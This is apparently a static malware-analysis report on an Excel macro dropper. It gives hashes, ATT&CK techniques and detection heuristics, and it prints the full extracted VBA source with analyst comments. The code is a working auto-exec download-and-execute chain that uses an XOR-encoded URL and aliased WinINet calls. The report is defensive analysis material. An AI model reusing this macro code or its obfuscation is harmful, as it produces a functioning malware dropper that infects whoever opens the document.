Xls.Dropper.Agent-1616819 — Office (OLE) malware analysis

Static analysis result for SHA-256 0ecabe0a7fceb2df…

MALICIOUS

Office (OLE)

60.0 KB Created: 2015-03-18 18:45:18 Authoring application: Microsoft Excel First seen: 2015-04-05
MD5: 8a12c1d3fb8111eb13ba10ba03373326 SHA-1: c7fcce3f2e11afd522f02991b3025de36bed0e4c SHA-256: 0ecabe0a7fceb2dfdce96295d0ecceca0d8e0546c976a913f0e10c819af70fc0
170 Risk Score

Malware Insights

Xls.Dropper.Agent-1616819 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer (WinINet download of a binary to %TEMP%, see TOPONO6) T1027 Obfuscated Files or Information (XOR-encoded strings decoded by MANAHD3, randomised API aliases, GoTo/loop junk code)

The file is identified as malicious by ClamAV and contains VBA macros. A Workbook_Open auto-exec handler (module ThisBook) chains through Phamt72loaj (File643) to KokoRuko (Module1), which creates COM objects via CreateObject and uses WinINet (InternetOpenA / InternetOpenUrlA / InternetReadFile, declared under randomised aliases in module Heroro6) to download a file into the user's temp folder and then open it with Shell.Application — a plain download-and-execute dropper. Note that the only URL extracted statically (the Ariawase GitHub project page) comes from a library attribution comment and is not the download location: the ProgIDs, the dropped filename and the download URL are stored as hex strings XOR-encoded with the key "Quyuiui3MM" and decoded at run time by MANAHD3 (module Corob5), so URL extraction alone misses the network indicator. Decoding the Module1 constants offline with that key yields Scripting.FileSystemObject, Shell.Application, \pirit86.exe (written to %TEMP%) and the download URL hxxp://www.lenhausen[.]de/js/bin.exe; the downloader identifies itself with User-Agent "PRO1". Treat the host, path, dropped filename and user-agent as indicators. The extracted script also carries unused Ariawase library modules (CDO constants, a Tuple-style class) and dead GoTo/loop constructs that pad the macro and defeat simple signatures.

Heuristics 6

  • ClamAV: Xls.Dropper.Agent-1616819 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1616819
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set lodppo21 = CreateObject _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://github.com/vbaidiot/Ariawase In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10280 bytes
SHA-256: 353b885f1215c3aa5d42257fd9b53bd422a6a7d6945c8c23818000965c9232ee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisBook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' [analyst] Auto-exec entry point: runs as soon as the workbook is opened with
' macros enabled. It does nothing itself except hand off to Phamt72loaj
' (module File643), which in turn calls KokoRuko (Module1), the actual
' download-and-execute routine.
Sub Workbook_Open()
Phamt72loaj
End Sub


Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Heroro6"
Option Explicit

' [analyst] WinINet imports under randomised alias names (identical mapping in
' the 64-bit and 32-bit branches):
'   HUDZOAKJJ -> InternetCloseHandle
'   AJJJAKKL3 -> InternetOpenA
'   BVBAJAIE1 -> InternetReadFile
'   ALKJPEQQ1 -> InternetOpenUrlA
' The only consumer in this listing is TOPONO6 (module Loop4).
' Note that the InternetCloseHandle wrapper declares its handle ByRef, so the
' callee receives the address of the VBA variable rather than the handle value;
' the close calls in TOPONO6 therefore most likely fail and the handles leak.
' That has no effect on the download itself.
#If VBA7 And Win64 Then
Public Declare PtrSafe Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As LongPtr, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function HUDZOAKJJ Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function AJJJAKKL3 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function BVBAJAIE1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal HOHOFI1 As Long, ByVal HAHABU4 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function ALKJPEQQ1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Attribute VB_Name = "File55"

'''+----                                                                   --+
'''|                             Ariawase 0.6.0                              |
'''|                Ariawase is free library for VBA cowboys.                |
'''|          The Project Page: https://github.com/vbaidiot/Ariawase         |
'''+--                                                                   ----+
' [analyst] Empty stub of the open-source Ariawase VBA library: the module
' holds no executable code. Its header comment is what produced the
' EMBEDDED_URL finding (github.com/vbaidiot/Ariawase). That URL is a library
' attribution, not a contact point of the dropper; the real download URL is
' XOR-encoded in Module1 and only decoded at run time by MANAHD3.
Option Explicit
Option Private Module




Attribute VB_Name = "File643"




' [analyst] CDO mail constants lifted from the Ariawase library. Nothing in
' this listing references the enum or any of the constants; they appear to be
' filler carried along to pad the macro project.
Public Enum CdoProtocolsAuthentication
    cdoAnonymous = 0
    cdoBasic = 1
    cdoNTLM = 2
End Enum

Public Const cdo7bit        As String = "7bit"
Public Const cdo8bit        As String = "8bit"
Public Const cdoISO_2022_JP As String = "iso-2022-jp"
Public Const cdoShift_JIS   As String = "shift-jis"
Public Const cdoEUC_JP      As String = "euc-jp"
Public Const cdoUTF_8       As String = "utf-8"

Public Const cdoBase64          As String = "base64"
Public Const cdoQuotedPrintable As String = "quoted-printable"
' [analyst] Intermediate hop between Workbook_Open and KokoRuko (Module1).
' The "For x = 0 To 0 / If x = 22 Then End" construct is dead code: the loop
' variable is only ever 0, so the End statement can never fire. The same
' pattern recurs throughout the listing with different literals and looks like
' junk inserted to break simple signatures.
Sub Phamt72loaj()

Dim KLAKKKSMMCV As Integer
For KLAKKKSMMCV = 0 To 0
If KLAKKKSMMCV = 22 Then End
Next KLAKKKSMMCV
KokoRuko

End Sub








Attribute VB_Name = "Loop4"
Option Explicit


' [analyst] Download parameters used by TOPONO6:
'   MBL   = 8162        size in bytes of the fixed-length read buffer
'   AAN   = "PRO1"      User-Agent passed to InternetOpenA (network indicator)
'   IOTD  = 1           INTERNET_OPEN_TYPE_DIRECT (no proxy configuration)
'   IFNCW = &H4000000   INTERNET_FLAG_NO_CACHE_WRITE (response is not stored
'                       in the WinINet/IE cache, so no cache artefact on disk)
Private Const MBL = 8162
Private Const AAN As String = "PRO1"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
' [analyst] Downloader. Fetches LINKO over WinINet and writes the raw response
' body to FILO1 in binary mode.
'   LINKO - URL to fetch (KokoRuko passes the XOR-decoded download URL)
'   FILO1 - destination path (KokoRuko passes %TEMP%\<decoded name>)
' Returns True whenever InternetOpenUrlA succeeded, regardless of how many
' bytes actually arrived: HUHUHISD6 starts as a copy of the whole 8162-byte
' fixed-length buffer, so KLOPA8 (its length) is never 0 on that path.
' Quirks to keep in mind when reconstructing the dropped file from a capture:
'   * the first chunk is appended untruncated (HUHUHISD6 = HAHABU4) while later
'     chunks are trimmed to the bytes read with Mid(); if the first read returns
'     fewer than MBL bytes, stale buffer content is written into the file;
'   * the body is shuttled through VBA String variables and written with Put,
'     i.e. an ANSI round trip - presumably lossless for a binary on the
'     observed code pages, but worth verifying against the dropped sample;
'   * there is no On Error handling in this routine.
Public Function TOPONO6(ByVal LINKO As String, ByVal FILO1 As String) As Boolean
    #If VBA7 And Win64 Then
        Dim HOHOFO2 As LongPtr, HOHOFI1 As LongPtr
    #Else
        Dim HOHOFO2 As Long, HOHOFI1 As Long
    #End If
    Dim HIHORE2 As Long
    Dim HAHABU4 As String * MBL, HUHUHISD6 As String
    Dim HEHEIFI5 As Integer, KLOPA8 As Double
    ' InternetOpenA(User-Agent "PRO1", INTERNET_OPEN_TYPE_DIRECT, no proxy, flags 0)
    HOHOFO2 = AJJJAKKL3(AAN, IOTD, vbNullString, vbNullString, 0)
    If HOHOFO2 = 0 Then
        Exit Function
    End If
    ' InternetOpenUrlA(session, url, no extra headers, INTERNET_FLAG_NO_CACHE_WRITE)
    HOHOFI1 = ALKJPEQQ1(HOHOFO2, LINKO, vbNullString, 0, IFNCW, 0)
    If HOHOFI1 = 0 Then
        KLOPA8 = 0
    Else
        ' First InternetReadFile: the whole buffer is kept, not just HIHORE2 bytes.
        BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
        HUHUHISD6 = HAHABU4
        ' Subsequent reads until InternetReadFile reports 0 bytes.
        Do While HIHORE2 <> 0
            BVBAJAIE1 HOHOFI1, HAHABU4, MBL, HIHORE2
            HUHUHISD6 = HUHUHISD6 + Mid(HAHABU4, 1, HIHORE2)
        Loop
        ' Write the accumulated body to disk; Put in Binary mode emits the
        ' string bytes with no length prefix.
        KLOPA8 = Len(HUHUHISD6): HEHEIFI5 = FreeFile
        Open FILO1 For Binary Access Write Lock Write As #HEHEIFI5
        Put #HEHEIFI5, , HUHUHISD6: Close #HEHEIFI5
    End If
    ' InternetCloseHandle is declared ByRef (module Heroro6), so these calls
    ' most likely pass a pointer instead of the handle and silently fail.
    HUDZOAKJJ HOHOFI1
    HUDZOAKJJ HOHOFO2
    HUHUHISD6 = ""
    If KLOPA8 Then
        TOPONO6 = True
    End If
End Function


Attribute VB_Name = "Corob5"
' [analyst] No-op: every GoTo jumps to the label on the next line, and the
' procedure is never called from anywhere in this listing. Junk filler.
Private Sub cdsf56GG()
GoTo cssghjtky7
cssghjtky7:
GoTo louioui89
louioui89:
GoTo mgsmshm
mgsmshm:
GoTo ntyntyty
ntyntyty:
GoTo nyttdndny
nyttdndny:
GoTo brtjtjty
brtjtjty:

End Sub
' [analyst] String decoder: XOR of a hex-encoded byte string against a
' repeating key. Every ProgID, path fragment and URL used by KokoRuko passes
' through this routine.
'   parampam1 - key (KokoRuko always passes ceew343vgVV = "Quyuiui3MM")
'   tarampam1 - hex string, two characters per output byte
' Key schedule: output byte i (1-based) is XORed with key character
' ((i Mod Len(key)) + 1), so the key stream starts at the key's 2nd character
' and wraps to the 1st when i = Len(key). Offline equivalent in Python:
'   bytes(b ^ ord(k[i % len(k)]) for i, b in enumerate(bytes.fromhex(h), 1))
' Applying it to the Module1 constants with that key gives:
'   cemMmm381    -> "Scripting.FileSystemObject"
'   ceceexcxxXXd -> "\pirit86.exe"
'   ceecqq902    -> hxxp://www.lenhausen[.]de/js/bin.exe   (download URL, defanged)
'   vEVeE3286    -> "Shell.Application"
' The For 0 To 0 / If = n Then End blocks inside are dead code (see Phamt72loaj).
Public Function MANAHD3(parampam1 As String, tarampam1 As String) As String
    Dim ziZItoTO1 As Long
    Dim loLOpoPO1 As String
    Dim keKEpePE1 As Integer
    
    Dim DKKALLLAKK As Integer
For DKKALLLAKK = 0 To 0
If DKKALLLAKK = 25 Then End
Next DKKALLLAKK
    
    Dim keKEpePE11 As Integer

    For ziZItoTO1 = 1 To (Len(tarampam1) / 2)
        ' Next ciphertext byte: hex pair at positions 2i-1 and 2i.
        keKEpePE1 = val("&H" & (Mid$(tarampam1, (2 * ziZItoTO1) - 1, 2)))
        ' Matching key byte per the schedule described above.
        keKEpePE11 = Asc(Mid$(parampam1, ((ziZItoTO1 Mod Len(parampam1)) + 1), 1))
        Dim LOAJNNCDHJ As Integer
        For LOAJNNCDHJ = 0 To 0
        If LOAJNNCDHJ = 14 Then End
        Next LOAJNNCDHJ
        loLOpoPO1 = loLOpoPO1 + Chr(keKEpePE1 Xor keKEpePE11)
         Dim PAPPAPPPAPP As Integer
        For PAPPAPPPAPP = 0 To 0
        If PAPPAPPPAPP = 4 Then End
        Next PAPPAPPPAPP
    Next ziZItoTO1
   MANAHD3 = loLOpoPO1
End Function

' [analyst] No-op twin of cdsf56GG: a chain of GoTo to the immediately
' following label, never referenced elsewhere in this listing. Junk filler.
Private Sub IHYbeffeVuJC()
GoTo asefbttttawf3
asefbttttawf3:
GoTo sgr4bsgbf67gfh
sgr4bsgbf67gfh:
GoTo sdvxcxb
sdvxcxb:
GoTo SSSDFBSS
SSSDFBSS:
GoTo UTYRURU
UTYRURU:
GoTo KKTKTJT
KKTKTJT:
GoTo IhzKeee2ascfacas2zw
IhzKeee2ascfacas2zw:

End Sub


Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' [analyst] Small tuple-like container that resembles the Ariawase library's
' Tuple class. No other module in this listing references Class1; it is benign
' library code carried along with the malicious modules and can be ignored
' for triage.
Private xInit As Boolean
Private xItems As Variant
Private xLength As Long

' Item1/Item2 do not bounds-check (Init guarantees at least two items).
Public Property Get Item1() As Variant
    Dim i As Long: i = 0
    If IsObject(xItems(i)) Then Set Item1 = xItems(i) Else Let Item1 = xItems(i)
End Property

Public Property Get Item2() As Variant
    Dim i As Long: i = 1
    If IsObject(xItems(i)) Then Set Item2 = xItems(i) Else Let Item2 = xItems(i)
End Property

' Item3/Item4 raise error 380 (invalid property value) when fewer items exist.
Public Property Get Item3() As Variant
    Dim i As Long: i = 2
    If xLength <= i Then Err.Raise 380
    If IsObject(xItems(i)) Then Set Item3 = xItems(i) Else Let Item3 = xItems(i)
End Property

Public Property Get Item4() As Variant
    Dim i As Long: i = 3
    If xLength <= i Then Err.Raise 380
    If IsObject(xItems(i)) Then Set Item4 = xItems(i) Else Let Item4 = xItems(i)
End Property

' One-shot initialiser: raises error 5 if called twice or with fewer than
' two items.
Public Sub Init(ParamArray itms() As Variant)
    If xInit Then Err.Raise 5
    xItems = itms
    xLength = UBound(itms) + 1
    
    If xLength < 2 Then Err.Raise 5
    xInit = True
End Sub

' Returns the underlying Variant array.
Public Function ToArray() As Variant
    ToArray = xItems
End Function

Attribute VB_Name = "Module1"
' [analyst] Encoded strings consumed by KokoRuko. Each hex constant decodes
' via MANAHD3 (XOR, key ceew343vgVV = "Quyuiui3MM") to:
'   vEVeE3286    -> "Shell.Application"            (used to run the dropped file)
'   ceceexcxxXXd -> "\pirit86.exe"                 (dropped filename, under %TEMP%)
'   ceecqq902    -> hxxp://www.lenhausen[.]de/js/bin.exe   (download URL, defanged)
'   cemMmm381    -> "Scripting.FileSystemObject"   (temp-folder lookup, delete, exists)
' The rabannsd0..4 integer constants are never referenced anywhere in this
' listing and look like filler.
Private Const vEVeE3286 = "261110051947723D3D3D1C1A141D1C065D"
Private Const rabannsd4 = 30
Private Const ceceexcxxXXd = "29091C1B1C1D0B7B63340D1C"
Private Const rabannsd2 = 31
Private Const ceecqq902 = "1D0D01194F461C3A3A265B1510071D08463E283F5B1D10461F1A1C2F243F5B1C0D0C"
Private Const rabannsd1 = 33
Private Const cemMmm381 = "261A0700051D5A232A7F3310190C26104039283C3A1B1F0C161D"
Private Const rabannsd0 = 34

' XOR key shared by every MANAHD3 call in this module.
Private Const ceew343vgVV = "Quyuiui3MM"
' [analyst] The payload routine (reached from Workbook_Open via Phamt72loaj).
' Behaviour, with the XOR constants decoded:
'   1. CreateObject("Scripting.FileSystemObject"), GetSpecialFolder(2)
'      (SpecialFolderConst 2 = TemporaryFolder) -> %TEMP%
'   2. build %TEMP%\pirit86.exe and delete it if it already exists
'   3. TOPONO6(hxxp://www.lenhausen[.]de/js/bin.exe, that path) - download
'   4. CreateObject("Shell.Application").Open(path) - execute the dropped file
' Module1 has no Option Explicit, so BIGABBDH1, dwwwdFO2, SSSS and SASASA are
' implicit Variants. The return value of TOPONO6 and the second FileExists
' check are both ignored (empty If blocks), so the Open call is attempted even
' when the download failed. SSSS is never assigned, so "Set SSSS = Nothing"
' is a no-op. The For 0 To 0 / If = n Then End blocks are dead code.
' Host-side indicators: file %TEMP%\pirit86.exe; network: GET to the URL above
' with User-Agent "PRO1".
Sub KokoRuko()


Dim lodppo21
' FileSystemObject #1 - only used for the temp-folder lookup.
Set lodppo21 = CreateObject _
(MANAHD3(ceew343vgVV, cemMmm381))
Dim UPANDNNN2
Const conspol3 = 2
Dim DLAPPAKKVD3 As Integer
For DLAPPAKKVD3 = 0 To 0
If DLAPPAKKVD3 = 4 Then End
Next DLAPPAKKVD3
Set UPANDNNN2 = lodppo21.GetSpecialFolder(conspol3)
Dim LPPAOOOAOAOMXNXNN As Integer
For LPPAOOOAOAOMXNXNN = 0 To 0
If LPPAOOOAOAOMXNXNN = 5 Then End
Next LPPAOOOAOAOMXNXNN
' Drop path: <TemporaryFolder> & "\pirit86.exe".
BIGABBDH1 = UPANDNNN2 & MANAHD3(ceew343vgVV, ceceexcxxXXd)
Dim PAOOKDKDKDAJWHNN21 As Integer
For PAOOKDKDKDAJWHNN21 = 0 To 0
If PAOOKDKDKDAJWHNN21 = 5 Then End
Next PAOOKDKDKDAJWHNN21
' FileSystemObject #2 - used for the delete/exists checks.
Set dwwwdFO2 = CreateObject _
(MANAHD3(ceew343vgVV, cemMmm381))
Dim ASS555ASS As Integer
For ASS555ASS = 0 To 0
If ASS555ASS = 5 Then End
Next ASS555ASS
' Remove any previous copy before downloading.
If dwwwdFO2.FileExists(BIGABBDH1) Then
dwwwdFO2.DeleteFile BIGABBDH1
End If
Dim APOHRKJBMXIKSHJ As Integer
For APOHRKJBMXIKSHJ = 0 To 0
If APOHRKJBMXIKSHJ = 15 Then End
Next APOHRKJBMXIKSHJ
' Download; the Boolean result is discarded.
If TOPONO6(MANAHD3(ceew343vgVV, ceecqq902), BIGABBDH1) Then
End If
Set SSSS = Nothing
Dim ALOOEPPPEPP2 As Integer
For ALOOEPPPEPP2 = 0 To 0
If ALOOEPPPEPP2 = 8 Then End
Next ALOOEPPPEPP2
' Existence check with an empty body - has no effect on control flow.
If dwwwdFO2.FileExists(BIGABBDH1) Then
End If
Dim PLKJHAGGGTTTS As Integer
For PLKJHAGGGTTTS = 0 To 0
If PLKJHAGGGTTTS = 3 Then End
Next PLKJHAGGGTTTS
' Shell.Application - its Open method launches the dropped executable.
Set SASASA = CreateObject _
(MANAHD3(ceew343vgVV, vEVeE3286))
Dim APQIEJAQPLQ As Integer
For APQIEJAQPLQ = 0 To 0
If APQIEJAQPLQ = 5 Then End
Next APQIEJAQPLQ
SASASA.Open BIGABBDH1

End Sub